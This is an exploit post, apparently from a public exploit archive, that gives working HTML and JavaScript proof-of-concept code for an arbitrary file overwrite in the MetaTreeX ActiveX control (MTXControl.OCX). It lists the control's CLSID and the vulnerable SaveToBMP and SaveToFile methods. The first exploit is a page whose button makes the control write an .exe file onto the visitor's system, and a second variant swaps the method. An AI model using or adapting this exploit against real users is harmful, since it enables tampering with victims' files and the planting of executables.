MetaTreeX Control 1.5 ActiveX Multiple Arbitrary File Overwrite Exploit

2009-03-16 17:02:41

<HTML>
MetaTreeX Control 1.5 (MTXControl.OCX) Multiple Arbitrary File Overwrite Exploit<br>
<br>
<br>
<br>
<br>
Found By : Cyber-Zone <br>
E-mail : [email protected] <br>
Home : WwW.IQ-TY.CoM ; WwW.No-ExploiT.CoM <br>
Sp Thanx : Hussin X , Jiko (Che7ta4Ever My Best Friend we Are No-Exploit TeaM) , StaCk , ALL Mgharba MoroCCo ...<br>
<br>
<br>
Download Product From : http://dl.filekicker.com/send/file/167724-JVEG/mxsetup.exe <br>
Home : http://www.metaproducts.com/default.asp <br>
Price : $70.00 <br>
<br>
<br>
<br>
<br>
<br>
Description : You can Exploit an Arbitrary File Overwrite In The Target System , Tested In SP2 FR Full Patched with IE 7 .<br>
<br>
<br>
Vulnerable functions : Sub SaveToBMP ( ByVal FileName As String , ByVal PixelFormat As TxPixelFormat ) and Sub SaveToFile ( ByVal FileName As String , ByVal Unicode As Boolean ) <br>
<br>
<br>
<!--
Report for Clsid: {67E66985-F81A-11D6-BC0F-F7B40157DC26}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
-->
<br>
<br>
Exploit 1 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::<br>
<br>
<title>Exploited By : Cyber-Zone </title>
<BODY>
<object id=cyber classid="clsid:{67E66985-F81A-11D6-BC0F-F7B40157DC26}"></object>

<SCRIPT>

function Do_it()
{
File = "Cyber.exe"
cyber.SaveToBMP(File)
}

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click here Baby :)"><br>
<br>
<br>
Exploit 2 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::<br>
Just Change The function in the first exmple from (SaveToBMP) to (SaveToFile) ;)<br>
</body>
</HTML>

#

Fixes

No fixes

In order to submit a new fix you need to be registered.